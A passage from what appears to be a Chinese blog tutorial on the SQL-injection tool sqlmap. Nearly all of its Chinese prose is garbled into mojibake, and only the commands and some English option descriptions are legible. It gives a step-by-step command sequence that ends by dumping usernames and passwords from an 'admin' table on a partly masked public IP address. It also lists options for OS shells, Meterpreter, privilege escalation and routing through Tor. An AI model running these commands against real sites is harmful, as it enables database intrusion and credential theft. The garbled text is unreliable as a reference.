æ¸éæµè¯å·¥å ·ä¹sqlmapæ³¨å ¥ç¥å¨
ä¸ï¼sqlmap详解
sqlmap使ç¨pythonç¼åçsqlæ³¨å ¥å·¥å ·ï¼æä» æ¯æpython2ã
sqlmapæ¯ä¸ä¸ªèªå¨åçsqlæ³¨å ¥å·¥å ·ï¼å ¶ä¸»è¦åè½æ¯æ«æãåç°å¹¶å©ç¨ç»å®çurlçsqlæ³¨å ¥æ¼æ´ï¼å ç½®äºå¾å¤ç»è¿çæ件ï¼æ¯æçæ°æ®åºæmysqlï¼oracleï¼mssqlï¼postgresqlï¼accessï¼db2ï¼sqliteï¼sybaseã
sqlmapéç¨äºç§ç¬ç¹çæ³¨å ¥æ¹å¼ï¼
1ï¼åºäºå¸å°ç±»åçç²æ³¨ï¼å¯ä»¥æ ¹æ®è¿å页é¢å¤ææ¡ä»¶çåçæ³¨å ¥ã
2ï¼åºäºæ¶é´ç±»åçç²æ³¨ï¼å©ç¨æ¡ä»¶è¯å¥æ¥çæ¶é´å»¶è¿è¯å¥æ¯å¦æ§è¡æ¥æ³¨å ¥ã
3ï¼åºäºæ¥éæ³¨å ¥ï¼é¡µé¢è¿åé误信æ¯æè ç´æ¥ææ³¨å ¥çè¯å¥ç´æ¥è¿åå°é¡µé¢ä¸ã
4ï¼èåæ¥è¯¢æ³¨å ¥ï¼å¯ä»¥ä½¿ç¨unionçæ åµä¸æ³¨å ¥ã
5ï¼å æ¥è¯¢æ³¨å ¥ï¼åæ¶æ§è¡å¤æ¡è¯å¥çæ³¨å ¥ã
sqlmap强大çåè½è¿å æ¬æ°æ®åºæ纹è¯å«ï¼æ°æ®åºæ举ï¼æ°æ®ææï¼è®¿é®ç®æ æ件系ç»ï¼å¹¶è·åå®å ¨çæä½æéå®æ¶ä»»æå½ä»¤ã
äºï¼sqlmapå ¥é¨æå·§
1ï¼å¤ææ¯å¦åå¨æ³¨å ¥ã
python sqlmap.py -u "http://127.0.0.1/sqlli/less-1/?id=1"
2,å¤æææ¬ä¸æ¯å¦åå¨æ³¨å ¥ã
python sqlmap.py -r 1.txt
æ¤å¤1.txtå¤äºsqlmapåç®å½ä¸ï¼è¿éä¹å¯ä»¥è·æ件çç»å¯¹è·¯å¾
3ï¼æ¥è¯¢å½åç¨æ·ä¸çææçæ°æ®åºã
python sqlmap.py -u "http://59.63.xxx.xxx/?id=1" --dbs
4ï¼è·åæ°æ®åºä¸ç表åã
python sqlmap.py -u "http://59.63.xxx.xxx/?id=1" -D maoshe --tables
4ï¼è·å表ä¸çå段åã
python sqlmap.py -u "http://59.63.xxx.xxx/?id=1" -D maoshe -T admin --columns
5ï¼è·åå段å 容ã
python sqlmap.py -u "http://59.63.xxx.xxx/?id=1" -D maoshe -T admin -C Id,password,username --dump
ä¸ï¼sqlmapè¿é¶æå·§ã
è¾åºçº§å«(Output verbosityï¼
åæ°ï¼-v
Sqlmapçè¾åºä¿¡æ¯æä»ç®å°ç¹å ±å为7个级å«ï¼åè«è¦å¨ä¸æ ·å¤ï¼ï¼ä¾æ¬¡ä¸º0ã1ã2ã3ã4ã5å6ã使ç¨åæ°â-v <级å«>âæ¥æå®æ个ç级ï¼å¦ä½¿ç¨åæ°â-v 6âæ¥æå®è¾åºçº§å«ä¸º6ãé»è®¤è¾åºçº§å«ä¸º1ãå个è¾åºçº§å«çæè¿°å¦ä¸ï¼
0ï¼åªæ¾ç¤ºPythonçtracebacksä¿¡æ¯ãé误信æ¯[ERROR]åå ³é®ä¿¡æ¯[CRITICAL]ï¼
1ï¼åæ¶æ¾ç¤ºæ®éä¿¡æ¯[INFO]åè¦åä¿¡æ¯[WARNING]ï¼
2ï¼åæ¶æ¾ç¤ºè°è¯ä¿¡æ¯[DEBUG]ï¼
3ï¼åæ¶æ¾ç¤ºæ³¨å ¥ä½¿ç¨çæ»å»è·è½½ï¼
4ï¼åæ¶æ¾ç¤ºHTTP请æ±ï¼
5ï¼åæ¶æ¾ç¤ºHTTPååºå¤´ï¼
6ï¼åæ¶æ¾ç¤ºHTTPååºä½ã
å个级å«è¾åºçä¿¡æ¯è¯¦ç»å°ä»ä¹ç¨åº¦ï¼è¿éè¦èªå·±å°è¯ä¸ï¼äº²ç¼è§å°ï¼æä¼ææç¡®ç认è¯ã
使ç¨æ ¼å¼: sqlmap [åæ°]
åæ°:
-h, âhelp æ¾ç¤ºåºæ¬ç帮å©ææ¡£
-hh æ¾ç¤ºé«çº§å¸®å©
âversion æ¾ç¤ºå½åçæ¬å·
-v VERBOSE Verbosity level: 0-6 (default 1)
ç®æ :
è³å°è¦æä¾è¿äºåæ°ä¸çä¸ä¸ªæ¥å®ä¹
åæ°ï¼
-d DIRECT ç¨äºè¿æ¥æ°æ®åºçè¿æ¥å符串
-u URL, âurl=URL ç®æ URL (e.g. âhttp://www.site.com/vuln.php?id=1â)
-l LOGFILE ç¨Burp æè WebScarab解æç®æ 代çææ¥å¿
-x SITEMAPURL è¿ç¨è§£æç®æ ç½ç«çè·¯å¾
-m BULKFILE æ«ææ件ä¸çå¤ä¸ªç®æ
-r REQUESTFILE ä»æ件ä¸å è½½httpå°å
-g GOOGLEDORK ç¨è°·æ解æç®æ
-c CONFIGFILE ä»iniçé ç½®æ件å è½½
è¦æ±:
è¿äºåæ°æ¯ç¨æ¥å¦ä½è¿æ¥å°ç®æ ç½ç«
âmethod=METHOD 对ç»å®çHTTPæ¹æ³ï¼ä¾å¦ææ¦å使ç¨ï¼
âdata=DATA å°è¦åéçæ°æ®å符串
âparam-del=PARA⦠ç¨äºåè£åæ°å¼çå符
âcookie=COOKIE HTTP Cookieæ å¤´å¼ cooikeæ³¨å ¥
âcookie-del=COO⦠ç¨äºåå²é¥¼å¹²å¼çå符
âload-cookies=L⦠å«Netscape / wget cookiesæä»¶æ ¼å¼
âdrop-set-cookie 忽ç¥è®¾ç½®ç头é¨ä¿¡æ¯
âuser-agent=AGENT HTTPç¨æ·ä»£çæ 头å¼
ârandom-agent 使ç¨éæºéæ©HTTPç¨æ·ä»£çæ 头å¼
âhost=HOST HTTP主æºå¤´å¼
âreferer=REFERER HTTP Refereræ¥å¤´å¼
-H HEADER, âhea⦠é¢å¤ç头é¨ä¿¡æ¯ (e.g. âX-Forwarded-For: 127.0.0.1â³)
âheaders=HEADERS é¢å¤çæ é¢ (e.g. âAccept-Language: fr\nETag: 123â³)
âauth-type=AUTH⦠HTTP ç认è¯ç±»å (Basic, Digest, NTLM or PKI)
âauth-cred=AUTH⦠HTTP认è¯è¯ä¹¦(name:password)
âauth-file=AUTH⦠HTTP认è¯PEMè¯ä¹¦/ç§é¥æ件
âignore-401 忽ç¥HTTP 401é误ï¼æªææçï¼
âproxy=PROXY 使ç¨ä»£çè¿æ¥å°ç®æ ç½å
âproxy-cred=PRO⦠代ç身份éªè¯åæ®ï¼å称ï¼å¯ç ï¼
âproxy-file=PRO⦠ä»æ件ä¸å 载代çå表
âignore-proxy 忽ç¥ç³»ç»é»è®¤ä»£ç设置
âtor 使ç¨æ´è±è·¯ç±ç½ç»
âtor-port=TORPORT 设置æ´è±è·¯ç±ç代ç端å£
âtor-type=TORTYPE 设置Tor代çç±»åï¼HTTPãSOCKS4æSOCKS5ï¼é»è®¤ï¼ï¼
âcheck-tor æ¥çæ´è±è·¯ç±çæ£ç¡®ä½¿ç¨
âdelay=DELAY æ¯ä¸ªHTTP请æ±ä¹é´çæ³åºæ¶é´
âtimeout=TIMEOUT çå¾ è¶ æ¶è¿æ¥ï¼é»è®¤30ï¼é»è®¤ä¸ºç§
âretries=RETRIES éè¯æ¶ï¼è¿æ¥è¶ æ¶ï¼é»è®¤3ï¼
ârandomize=RPARAM ç»å®åæ°çéæºååå¼ï¼sï¼
âsafe-url=SAFEURL å¨æµè¯è¿ç¨ä¸ç»å¸¸è®¿é®çç½åå°å
âsafe-post=SAFE⦠postæ°æ®åéå°ä¸ä¸ªå®å ¨çç½å
âsafe-req=SAFER⦠å®å ¨HTTP请æ±ä»æ件å è½½
âsafe-freq=SAFE⦠ä¸ä¸ªç»å®çå®å ¨å°åç两次访é®ä¹é´çæµè¯è¯·æ±
âskip-urlencode è·³è¿ææè½½è·æ°æ®çç½åç¼ç
âcsrf-token=CSR⦠åæ°ç¨æ¥ä¸¾è¡åCSRF令ç
âcsrf-url=CSRFURL URLå°å访é®æåé²CSRF令ç
âforce-ssl 使ç¨SSL / HTTPSå
âhpp 使ç¨HTTPåæ°æ±¡æçæ¹æ³
âeval=EVALCODE Evaluate provided Python code before the request
(e.g.âimport hashlib;id2=hashlib.md5(id).hexdigest()â)
ä¼ååæ°:
è¿äºé项å¯ç¨äºä¼åæ§è½sqlmap
-o æå¼ææçä¼åå¼å ³
âpredict-output æ®éæ¥è¯¢è¾åºé¢æµ
âkeep-alive 使ç¨æä¹ HTTPï¼Sï¼è¿æ¥
ânull-connection æ£ç´¢é¡µé¢é¿åº¦æ²¡æå®é çHTTPååºä½
âthreads=THREADS æ大并åHTTP请æ±æ°ï¼Sï¼ï¼é»è®¤ä¸º1ï¼
æ³¨å ¥:
è¿äºé项å¯ä»¥ç¨æ¥æå®è¦æµè¯çåæ°ï¼æä¾èªå®ä¹æ³¨å ¥ææè½½è·åéæ篡æ¹å§æ¬
-p TESTPARAMETER å¯æ£éªåæ°ï¼sï¼
âskip=SKIP 对ç»å®åæ°çè·³è¿æµè¯ï¼sï¼
âskip-static è·³è¿ä¸åºç°å¨æçæµè¯åæ°
âdbms=DBMS 强å¶å端æ°æ®åºç®¡çç³»ç»å°è¿ä¸ªå¼
âdbms-cred=DBMS⦠æ°æ®åºç®¡çç³»ç»è®¤è¯è¯ä¹¦ï¼ç¨æ·ï¼å¯ç ï¼
âos=OS 强å¶å端çæ°æ®åºç®¡çç³»ç»æä½ç³»ç»å°è¿ä¸ªå¼
âinvalid-bignum 使ç¨å¤§æ°åæ æå¼
âinvalid-logical 使ç¨é»è¾æä½çæ æå¼
âinvalid-string 使ç¨éæºå符串æ æå¼
âno-cast å ³éææè½½è·æ¨¡å
âno-escape å ³éå符串éé¸æºå¶
âprefix=PREFIX æ³¨å ¥ææè½½è·åç¼å符串
âsuffix=SUFFIX æ³¨å ¥ææè½½è·åç¼å符串
âtamper=TAMPER ç¨äºç¯¡æ¹æ³¨å ¥æ°æ®çç»å®èæ¬
æ£æµ:
è¿äºé项å¯ç¨äºèªå®ä¹æ£æµé¶æ®µ
âlevel=LEVEL è¦æ§è¡çæµè¯æ°´å¹³ï¼1-5ï¼é»è®¤ä¸º1ï¼
ârisk=RISK è¦æ§è¡çæµè¯çé£é©ï¼1-3ï¼é»è®¤ä¸º1ï¼
âstring=STRING å½æ¥è¯¢è¯ä¼°ä¸ºçæ¶çå符串å¹é
ânot-string=NOT⦠å½æ¥è¯¢è¯ä¼°ä¸ºåæ¶çå符串å¹é
âregexp=REGEXP æ£å表达å¼å¹é æ¥è¯¢æ¶è¿è¡çæ£ç
âcode=CODE HTTP代ç æ¶å¹é çæ¥è¯¢è¡¨è¾¾å¼ä¸ºç
âtext-only ä» åºäºææ¬å 容ç页é¢æ¯è¾
âtitles ä» æ ¹æ®ä»ä»¬çæ é¢è¿è¡æ¯è¾
ææ¯:
è¿äºé项å¯ä»¥ç¨æ¥è°æ´ç¹å®SQLæ³¨å ¥æµè¯ææ¯
âtechnique=TECH SQLæ³¨å ¥ææ¯ç使ç¨ï¼é»è®¤âbeustqâï¼
âtime-sec=TIMESEC 延è¿æ°æ®åºç®¡çç³»ç»ååºçç§æ°ï¼é»è®¤ä¸º5ï¼
âunion-cols=UCOLS 为èåæ¥è¯¢çSQLæ³¨å ¥æµè¯åèå´
âunion-char=UCHAR å符使ç¨bruteforcingåæ°
âunion-from=UFROM 表使ç¨ä»èåæ¥è¯¢çSQLæ³¨å ¥çä¸é¨å
âdns-domain=DNS⦠使ç¨çååDNSæ³é²æ»å»
âsecond-order=S⦠æç´¢ç第äºçº§ååºç»æ页é¢çç½å
æ纹:
-f, âfingerprint æ§è¡å¹¿æ³çæ°æ®åºç®¡çç³»ç»çæ¬æ纹
æ举åæ°:
è¿äºé项å¯ä»¥ç¨æ¥æ举å端æ°æ®åºç®¡çç³»ç»ä¿¡æ¯ãç»æåæ°æ®ä¸å å«çå¹³å°.æ¤å¤ï¼ä½ å¯ä»¥è¿è¡ä½ èªå·±çSQLè¯å¥
-a, âall Retrieve everything
-b, âbanner æ£ç´¢æ°æ®åºæ å¿
âcurrent-user æ£ç´¢æ°æ®åºç®¡çç³»ç»å½åç¨æ·
âcurrent-db æ£ç´¢æ°æ®åº
âhostname æ£ç´¢æ°æ®åºæå¡å¨ç主æºå
âis-dba æ£æµå½åç¨æ·æ¯ä¸æ¯æ°æ®åºç管çå
âusers æ举æ°æ®åºç¨æ·
âpasswords æ举æ°æ®åºç¨æ·å¯ç çåå¸å¼
âprivileges æ举æ°æ®åºç®¡çç³»ç»ç¨æ·æé
âroles æ举æ°æ®åºç®¡çç³»ç»ç¨æ·è§è²
âdbs æ举æ°æ®åº
âtables æ举æ°æ®åºç®¡çç³»ç»ä¸çæ°æ®åºè¡¨
âcolumns æ举æ°æ®åºç®¡çä¸çæ°æ®åºè¡¨å
âschema æ举æ°æ®åºæ¶æ
âcount æ索表çæ¡ç®æ°
âdump æ裤衩å
âdump-all ææ°æ®åºæ°æ¯æ¯
âsearch æç´¢æ°æ®åºååæ°æ®åºå称
âcomments æ£æµæ°æ®åºçä¿¡æ¯
-D DB æ举æ°æ®åº
-T TBL æ举æ°æ®åºç表
-C COL æ举æ°æ®åºè¡¨çå
-X EXCLUDECOL ä¸æ举çæ°æ®åºç®¡çç³»ç»æ°æ®åºè¡¨
-U USER æ°æ®åºç¨æ·æ举
âexclude-sysdbs Exclude DBMS system databases when enumerating tables
âpivot-column=P.. 主æ°æ®åºè¡¨å称
âwhere=DUMPWHERE Use WHERE condition while table dumping
âstart=LIMITSTART æ¥è¯¢è¾åºç¬¬ä¸ä¸ªè¾åºæ¡ç®çæ£ç´¢
âstop=LIMITSTOP æ¥è¯¢æåè¾åºé¡¹çæ£ç´¢
âfirst=FIRSTCHAR æ¥è¯¢ç¬¬ä¸ä¸ªè¾åºåå符æ£ç´¢
âlast=LASTCHAR æ¥è¯¢æåè¾åºåå符æ£ç´¢
âsql-query=QUERY è¦æ§è¡çSQLè¯å¥
âsql-shell æ示ä¸ä¸ªSQL shell
âsql-file=SQLFILE ä»ç»å®çæ件æ§è¡SQLè¯å¥ï¼Sï¼
æ´åç ´è§£:
è¿äºé项å¯ä»¥ç¨æ¥è¿è¡è®åæµè¯
âcommon-tables æ£æ¥å¸¸è§è¡¨çåå¨æ§
âcommon-columns æ£æ¥å
Œ
±åçåå¨
ç¨æ·å®ä¹å½æ°æ³¨å ¥:
è¿äºé项å¯ç¨äºå建èªå®ä¹çç¨æ·å®ä¹å½æ°
âudf-inject 注å
¥ç¨æ·èªå®ä¹çå½æ°
âshared-lib=SHLIB å
±äº«åºçæ¬å°è·¯å¾
æ件系ç»è®¿é®:
è¿äºé项å¯ç¨äºè®¿é®åå°æ°æ®åºç®¡çç³»ç»çåºå±æ件系ç»
âfile-read=RFILE ä»åå°çæ°æ®åºç®¡çç³»ç»æ件系ç»ä¸è¯»åä¸ä¸ªæ件
âfile-write=WFILE å¨åå°çæ°æ®åºç®¡çç³»ç»æ件系ç»ä¸åä¸ä¸ªæ¬å°æ件
âfile-dest=DFILE åå°æ°æ®åºçç»å¯¹è·¯å¾å
æä½ç³»ç»è®¿é®:
è¿äºé项å¯ç¨äºè®¿é®åå°æ°æ®åºç®¡çç³»ç»åºå±æä½ç³»ç»
âos-cmd=OSCMD æ§è¡æä½ç³»ç»å½ä»¤
âos-shell ç¨äºäº¤äºå¼æä½ç³»ç»shellçæ示
âos-pwn æ¾ç¤ºOOB shell, Meterpreter oræè
VNC
âos-smbrelay One click prompt for an OOB shell, Meterpreter or VNC
âos-bof åå¨è¿ç¨ç¼å²åºæº¢åºå¼å
âpriv-esc æ°æ®åºè¿ç¨ç¨æ·æéå级
âmsf-path=MSFPATH æ¬å°è·¯å¾å¨metasploitæ¡æ¶å®è£
âtmp-path=TMPPATH 临æ¶æ件ç®å½çè¿ç¨ç»å¯¹è·¯å¾
Windows注å表访é®:
è¿äºé项å¯ç¨äºè®¿é®åå°æ°æ®åºç®¡çç³»ç»ç注å表
âreg-read 读åä¸ä¸ªçªå£æ³¨å表项
âreg-add åä¸ä¸ªçªå£æ³¨å表项çæ°æ®
âreg-del å é¤ä¸ä¸ªæ³¨å表项
âreg-key=REGKEY Windows注å表
âreg-value=REGVAL 注å表项çå
³é®å¼
âreg-data=REGDATA 注å表é®å¼æ°æ®
âreg-type=REGTYPE 注å表é®å¼ç±»å
常è§:
è¿äºé项å¯ä»¥ç¨æ¥è®¾ç½®ä¸äºå¸¸è§çå·¥ä½åæ°
-s SESSIONFILE ä»åå¨å è½½ä¼è¯ï¼sqliteï¼æ件
-t TRAFFICFILE Log all HTTP traffic into a textual file
âbatch Never ask for user input, use the default behaviour
âbinary-fields=.. Result fields having binary values (e.g. âdigestâ)
âcharset=CHARSET ç¨äºæ°æ®æ£ç´¢çåå符ç¼ç
âcrawl=CRAWLDEPTH ä»ç®æ ç½åå¼å§æåç½ç«
âcrawl-exclude=.. æ£å表达å¼ä»ç¬è¡æé¤é¡µ (e.g. âlogoutâ)
âcsv-del=CSVDEL éå®ä½¿ç¨CSVè¾åºç¹æ§ (default â,â)
âdump-format=DU.. 转å¨æ°æ®æ ¼å¼ (CSV (default), HTML or SQLITE)
âeta æ¾ç¤ºä¸ºæ¯ä¸ªè¾åºä¼°è®¡çå°è¾¾æ¶é´
âflush-session å½åç®æ çå·æ°ä¼è¯æ件
âforms ç®æ ç½åç解æåæµè¯å½¢å¼
âfresh-queries 忽ç¥åå¨å¨ä¼è¯æ件ä¸çæ¥è¯¢ç»æ
âhex 使ç¨æ°æ®åºç®¡çç³»ç»çåå
è¿å¶å½æ°ï¼Sï¼è¿è¡æ°æ®æ£ç´¢
âoutput-dir=OUT.. èªå®ä¹è¾åºç®å½è·¯å¾
âparse-errors 解æåæ¾ç¤ºååºä¸çæ°æ®åºç®¡çç³»ç»é误æ¶æ¯
âsave=SAVECONFIG ä¿åé项æ¥é
ç½®INIæ件
âscope=SCOPE æ£å表达å¼è¿æ»¤æä¾ä»£çæ¥å¿ç®æ
âtest-filter=TE.. éæ©æµè¯çææè½½è·å/æ头æ件(e.g. ROW)
âtest-skip=TEST.. è·³è¿è¯éªè½½è·å/ææ é¢ (e.g. BENCHMARK)
âupdate æ´æ°sqlmap
æ项:
-z MNEMONICS çæè®°å¿(e.g. âflu,bat,ban,tec=EUâ)
âalert=ALERT è¿è¡ä¸»æºæä½ç³»ç»å½ä»¤ï¼sï¼æ¶ï¼SQL注å
¥æ¯åç°
âanswers=ANSWERS æ¼æ´çæ¡é(e.g. âquit=N,follow=Nâ)
âbeep å½æ注å
¥ç¹è¢«åç°çæ¶åæ¥è¦
âcleanup æ¸
çæ°æ®åºä»sqlmapå
·ä½UDFå表
âdependencies æ£æ¥æ²¡æçï¼éæ ¸å¿ï¼sqlmapä¾èµå
âdisable-coloring ç¦ç¨æ§å¶å°è¾åºçè²
âgpage=GOOGLEPAGE 使ç¨è°·æè¿ä¸ç»æä»æå®ç页ç
âidentify-waf 使ä¸ä¸ªWAFï¼IPS / IDSä¿æ¤å
¨é¢æµè¯
âmobile 模仿æºè½ææºéè¿HTTPç¨æ·ä»£çæ 头
âoffline å¨è±æºæ¨¡å¼ä¸å·¥ä½ï¼åªä½¿ç¨ä¼è¯æ°æ®ï¼
âpage-rank æ¾ç¤ºç½é¡µæåï¼PRï¼ä¸ºè°·æè¿ä¸ç»æ
âpurge-output å®å
¨å°å é¤è¾åºç®å½ä¸çææå
容
âskip-waf è·³è¿WAFï¼IPS / IDSä¿æ¤å¯åå¼æ£æµ
âsmart åªæ积æçå¯åå¼ï¼Sï¼è¿è¡å½»åºçæµè¯
âsqlmap-shell æ示ä¸ä¸ªäºå¨çsqlmap shell
âtmp-dir=TMPDIR ç¨äºåå¨ä¸´æ¶æ件çæ¬å°ç®å½
âwizard 为åå¦è
ç¨æ·æä¾ç®åçå导çé¢